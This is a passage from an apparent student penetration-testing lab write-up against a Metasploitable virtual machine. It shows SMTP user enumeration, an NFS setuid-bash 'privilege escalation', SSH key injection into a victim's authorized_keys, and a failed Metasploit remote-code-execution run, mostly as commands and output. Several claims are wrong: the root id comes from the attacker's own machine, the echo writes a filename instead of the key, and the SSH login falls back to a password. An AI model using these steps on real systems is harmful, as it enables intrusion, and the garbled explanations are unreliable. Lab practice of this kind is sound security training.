6000/tcp  open  X11
6667/tcp  open  irc
8009/tcp  open  ajp13
8180/tcp  open  unknown
MAC Address: 08:00:27:FD:5B:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds
```

Unfortunately the script did not work in the above scenario.

Using telnet manually

Using telnet service, we tried executing **VRFY & RCPT** commands

```
root@kali:/# telnet 192.168.56.105 25
Trying 192.168.56.105 ...
Connected to 192.168.56.105.
Escape character is '^]'.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY bin
252 2.0.0 bin
VRFY daemon
252 2.0.0 daemon
^]
```

```
root@kali:/# telnet 192.168.56.105 25
Trying 192.168.56.105 ...
Connected to 192.168.56.105.
Escape character is '^]'.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
MAIL FROM: root
250 2.1.0 Ok
RCPT TO: root
250 2.1.5 Ok
RCPT TO: bin
250 2.1.5 Ok
RCPT TO: test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
```

OUTPUT: We tried both manual method and by metasploit tool to get list of mail users and also executed VRFY and RCPT commands in manual method using telnet. for nmap, it did not work and for telnet we tried sending mail from root to bin but it was rejected. In metasploit it displayed the users list successfully.

20. NFS - Privilege escalation & SSH login

- **NFS privilege escalation**

So privilege escalation is an exploit where an attacker tries to get an elevated access to a resource or system that are generally protected by authorised user or application.

Using nmap we can check if port 2049 is open.

Now, before performing such activity, we must study the target system, how it operates and slowly try to compromise that system and then move on to the privilege escalation phase.

- we create a new user **user_1** inside tmp folder
- we know **/home** is a shared directory and we try to mount on **/tmp/user_1**
- we copy **/bin/bash**, a local exploit and hence we set the user permission to **root**
- now **user_1** gets root access

```
root@kali:/# mkdir /tmp/user_1
root@kali:/# mount -t nfs 192.168.56.105:/home /tmp/user_1
root@kali:/# cd /tmp/user_1
root@kali:/tmp/user_1# cp /bin/bash
cp: missing destination file operand after '/bin/bash'
Try 'cp --help' for more information.
root@kali:/tmp/user_1# cp /bin/bash .
root@kali:/tmp/user_1# chmod +s bash
root@kali:/tmp/user_1# ls -la bash
-rwsr-sr-x 1 root root 1168776 May  5 21:25 bash
root@kali:/tmp/user_1# id
uid=0(root) gid=0(root) groups=0(root)
root@kali:/tmp/user_1# whoami
root
root@kali:/tmp/user_1#
```

OUTPUT: In the above we created a dummy user file inside tmp and executed a exploit to gain root access. Now we can see root user id and user_1 gains all privileges of root user which is an elevated privilege for him. He can modify/ add/ delete any files or folders.

- **NFS SSH login**

We can also use SSH login and try using exploit to gain root access. For SSH login, if we know the password then we can gain access to remote system. Without key, we can generate a new key and append to **authorized_keys**. Thus we create own SSH keys and append the newly created public key into the authorized_key of the victim user. Then log into the remote host with the victim user and own password.

- We create a new directory **direc_1** under /tmp and now we mount our **/home** to the newly created directory by the following syntax,

Syntax: **mount -t nfs 192.168.100.25:/home /tmp/direc_1**

-t: Specifies the type of file system that performs the logical mount request. The NFS parameter must be used.

```
root@kali:/# showmount -e 192.168.56.105
Export list for 192.168.56.105:
/*
root@kali:/# mkdir /tmp/direc_1
root@kali:/# mount -t nfs 192.168.56.105:/home /tmp/direc_1
```

- Now we go to /tmp/direc_1 directory and list the content. The content listed are from /home folder of the remote host. Then we can find the **.ssh** folder inside **msfadmin** folder.

```
root@kali:/# cd /tmp/direc_1
root@kali:/tmp/direc_1# ls -al
total 1172
drwxr-xr-x  6 root  root      4096 May  5 21:25 .
drwxrwxrwt 19 root  root      4096 May 20 10:50 ..
-rwsr-sr-x  1 root  root    1168776 May  5 21:25 bash
drwxr-xr-x  2 root nogroup   4096 Mar 17 2010 ftp
drwxr-xr-x  7 kali  kali     4096 May  4 06:25 msfadmin
drwxr-xr-x  2 1002  1002     4096 Apr 16 2010 service
drwxr-xr-x  3 1001  1001     4096 May  7 2010 user
root@kali:/tmp/direc_1# cd msfadmin/
root@kali:/tmp/direc_1/msfadmin# ls
vulnerable
root@kali:/tmp/direc_1/msfadmin# ls -al
total 44
drwxr-xr-x  7 kali  kali  4096 May  4 06:25 .
drwxr-xr-x  6 root  root  4096 May  5 21:25 ..
lrwxrwxrwx  1 root  root   9 May 14 2012 .bash_history → /dev/null
drwxr-xr-x  4 kali  kali  4096 Apr 17 2010 .distcc
drwx----- 2 kali  kali  4096 May  5 06:25 .gconf
drwx----- 2 kali  kali  4096 May  5 06:25 .gconfd
-rw----- 1 root  root  4174 May 14 2012 .mysql_history
-rw-r--r-- 1 kali  kali  586 Mar 16 2010 .profile
-rwx----- 1 kali  kali   4 May 20 2012 .rhosts
drwx----- 2 kali  kali  4096 May 17 2010 .ssh
-rw-r--r-- 1 kali  kali    0 May  7 2010 .sudo_as_admin_successful
drwxr-xr-x  7 kali  kali  4096 May  4 23:45 vulnerable
root@kali:/tmp/direc_1/msfadmin# cd .ssh
root@kali:/tmp/direc_1/msfadmin/.ssh# ls -al
total 20
drwx----- 2 kali  kali  4096 May 17 2010 .
drwxr-xr-x  7 kali  kali  4096 May  4 06:25 ..
-rw-r--r-- 1 kali  kali  609 May  7 2010 authorized_keys
-rw----- 1 kali  kali  1675 May 17 2010 id_rsa
-rw-r--r-- 1 kali  kali  405 May 17 2010 id_rsa.pub
```

- This .ssh folder contains the public, private and authorized key for the SSH login for the specific user as we see above highlighted.
- Now we create our own ssh key and append that public key into the authorized_keys of target host. For that we use **ssh-keygen** command. Hence, by cat command, we can view the key generated.

```
root@kali:/# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): direc_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in direc_rsa.
Your public key has been saved in direc_rsa.pub.
The key fingerprint is:
SHA256:TiVX/tphesmcRziGdCyFhETNkgGMpZYsOYAO8i1M/c root@kali
The key's randomart image is:
+---[RSA 3072]----+
|o o+..oo.B=
|= ...+.o ...+o.
| 00 * . . . =
| + + .+ 0 0 0 .
| . .ES o . . ..
| . . .+00.
| . .0..
| o ..o
| ..o+.
+----[SHA256]----+
root@kali:/# cat direc_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAQABAAQgQuokZELKebpVmWPF1CuPry34qmmI3pU6F+/5I0KPxw3agRRl8fimre7rCi15j3es0EdjdIci9CQuBn3HctbMcmJ48UYbCheZWcx3VSHTD+INbFkvWkkaY4sT
3ek87cRoFpbKCVU1PpAMZjoqwGERQIhYQj6MrZ2v/H059w4k5E60j+iRC016Jr2W22lZtp2qncPljoh2WLM5jhha3waeYjStyDvrBIZUBbbs+QgeEGMBlthea1fpkbUqSyPwY5hp5/SMhUeeJwT2FZMhF9+f
yRR1QpvMW0uTX06hBekjbgax95xybVfXGA/hCWQieL2UPlyPr/NEqYB81th9zhE1LMU30QRvN8C2MhR713Ly7/73vFMRwNIZWWfcsg/lyT0UofDCVLYHWN1jcrZ0BB8/wKGOp+qTDy/qLJ0T07RjnjDOHDJg
q53G3LVHV2t9Y/q9tV4vTHvcylu5ApJXIPWO+xEvuXIspZMv+cGpz87jc6rHOp0b4EyMq3tqv8Hk= root@kali
Activate Windows
```

- Go to /.ssh folder and now merge this key into authorized_keys by **echo** command

```
root@kali:/tmp/direc_1/msfadmin/.ssh# echo direc_rsa >> authorized_keys
root@kali:/tmp/direc_1/msfadmin/.ssh# cat authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBANWgcbHvxF2YRX0gTizyoZazzHiU5+63hKF0hzJch8dZQpFU5gGKDz30rC4jrNqCXNDN50RA4ylcNt078B/I4+5YCZ39faSiXIoLf18t0WtTtg3lkuv3eSV0zuSGeqZP
HMtep6iizQA5yoClkCyj8swXH+cPBG5uRPiXYL911rAAAAFQDL+pKrLy6vy9HCywXWZ/jcPpPHEQAAIAgt+cN3fDT1RRCYz/VmqfUsqW4jtZ06kvx3L82T2Z1YVe7929JWeu9d30B+NeE8EopMiWaTZT0WI
+0kzxSAgyuTskue4nvGCfxnDr58xa1pZcS066R5jCSARMHU6WBWIId3MYzsJNzqTN4uoRa4tIFwM8X99K0UUvmlNbPBByAAAAAIBnfKRDwM/QnEpRTTsRBh9rALq6eDbLNbu/5gozf4Fv1Dt1Zmq5ZxtXeQtW5
BYyorILRZ5/Y4pChRa01bxTRSjah0Rjk5wxAUPZ282N07fzcJyVlBojMvPlbApplpSiecCuLGX7G04Ie8SFzT+wCketP9Vrw0PvtUZU3DfrVTCytg= user@metasploitable
direc_rsa
```

- Finally login using ssh to remote host as login **msfadmin** by the command

Syntax: **ssh -i direc_rsa msfadmin@10.0.50.58**

-i : provides the path where our private key is located

Hence, we gained access to remote host and executed commands to know the **id** of the host, hostname etc.

```

root@kali:/# ssh -i direc_rsa msfadmin@192.168.56.105
msfadmin@192.168.56.105's password:
Permission denied, please try again.
msfadmin@192.168.56.105's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue May  5 10:59:04 2020 from 192.168.56.101
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin)

```

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OUTPUT: Through SSH login, we entered into remote host and executed shell commands to know the id successfully. If we dont have key to login to ssh, we can create like the above mentioned scenario

21. RSH - Remote code execution

The RSH remote shell service (rsh) is enabled. This is a legacy service often configured to blindly trust some hosts and IPs. The protocol also doesn't support encryption or any sort of strong authentication mechanism.

We use the module **exploit/multi/misc/bmc_server_automation_rscd_nsh_rce**

#	Name	Disclosure Date	Rank	Check	Description
-	---				
0	auxiliary/scanner/rservices/rsh_login		normal	No	rsh Authentication Scanner
1	encoder/cmd/powershell_base64		excellent	No	Powershell Base64 Command Encoder
2	exploit/linux/http/empire_skywalker	2016-10-15	excellent	Yes	PowerShellEmpire Arbitrary File Upload (Skywalker)
3	exploit/linux/http/php_imap_open_rce	2018-10-23	good	Yes	php imap_open Remote Code Execution
4	exploit/linux/http/pineapple_preconfig_cmdinject	2015-08-01	excellent	Yes	Hak5 WiFi Pineapple Preconfiguration Command Injectio
n					
5	exploit/linux/local/abrt_raceabrt_priv_esc	2015-04-14	excellent	Yes	ABRT raceabrt Privilege Escalation
6	exploit/linux/local/cpi_rnrrshell_priv_esc	2018-12-08	excellent	No	Cisco Prime Infrastructure Runrshell Privilege Escala
tion					
7	exploit/multi/browser/java_jre17_driver_manager	2013-01-10	excellent	No	Java Applet Driver Manager Privileged toString() Remo
te Code Execution					
8	exploit/multi/browser/java_jre17_exec	2012-08-26	excellent	No	Java 7 Applet Remote Code Execution
lation					
9	exploit/multi/browser/java.rmi_connection_impl	2010-03-31	excellent	No	Java RMIClnectionImpl Deserialization Privilege Esca
10	exploit/multi/fileformat/ghostscript_failed_restore	2018-08-21	excellent	No	Ghostscript Failed Restore Command Execution
11	exploit/multi/http/git_client_command_exec	2014-12-18	excellent	No	Malicious Git and Mercurial HTTP Server For CVE-2014-
9390					
12	exploit/multi/http/jenkins_xstream_deserialize	2016-02-24	excellent	Yes	Jenkins XStream Groovy classpath Deserialization Vuln
erability					
13	exploit/http/openmrs_deserialization	2019-02-04	normal	Yes	OpenMRS Java Deserialization RCE
14	exploit/http/struts2_rest_xstream	2017-09-05	excellent	Yes	Apache Struts 2 REST Plugin XStream RCE
15	exploit/multi/misc/bmc_patrol_cmd_exec	2019-01-17	excellent	No	BMC Patrol Agent Privilege Escalation Cmd Execution
16	exploit/multi/misc/bmc_server_automation_rscd_nsh_rce	2016-03-16	excellent	Yes	BMC Server Automation RSCD Agent NSH Remote Command E
ecution					
17	exploit/multi/misc/freeswitch_event_socket_cmd_exec	2019-11-03	excellent	Yes	FreeSWITCH Event Socket Command Execution
18	exploit/multi/misc/osgi_console_exec	2018-02-13	normal	Yes	Eclipse Equinox OSGi Console Command Execution
edObject					
19	exploit/multi/misc/weblogic_deserialize_marshalledobject	2016-07-19	manual	No	Oracle Weblogic Server Deserialization RCE - Marshall
20	exploit/multi/postgres/postgres_copy_from_program_cmd_exec	2019-03-20	excellent	Yes	PostgreSQL COPY FROM PROGRAM Command Execution
21	exploit/multi/script/web_delivery	2013-07-19	manual	No	Script Web Delivery
22	exploit/multi/vnc/vnc_keyboard_exec	2015-07-10	great	No	VNC Keyboard Remote Code Execution
escalation					
23	exploit/osx/local/rsh_libmalloc	2015-10-01	normal	No	Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege E
24	exploit/solaris/local/rsh_stack_clash_priv_esc	2017-06-19	good	Yes	Solaris RSH Stack Clash Privilege Escalation

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Under settings, we changed the hostname and set verbose true

```
Module options (exploit/multi/misc/bmc_server_automation_rscd_nsh_rce):
  Name   Current Setting  Required  Description
  ----  -----  -----  -----
  RHOSTS          yes      yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT           4750     yes      The target port (TCP)

Exploit target:
  Id  Name
  --  --
  0   Automatic
```

```
msf5 exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set VERBOSE true
VERBOSE => true
msf5 exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > run

[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 192.168.56.105:4750 - Detecting remote platform for auto target selection.
[*] 192.168.56.105:4750 - Connecting to RSCD agent and sending fake auth.
[-] 192.168.56.105:4750 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.56.105:4750).
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) >
```

No session was created for the module.

22. PHP - Remote code execution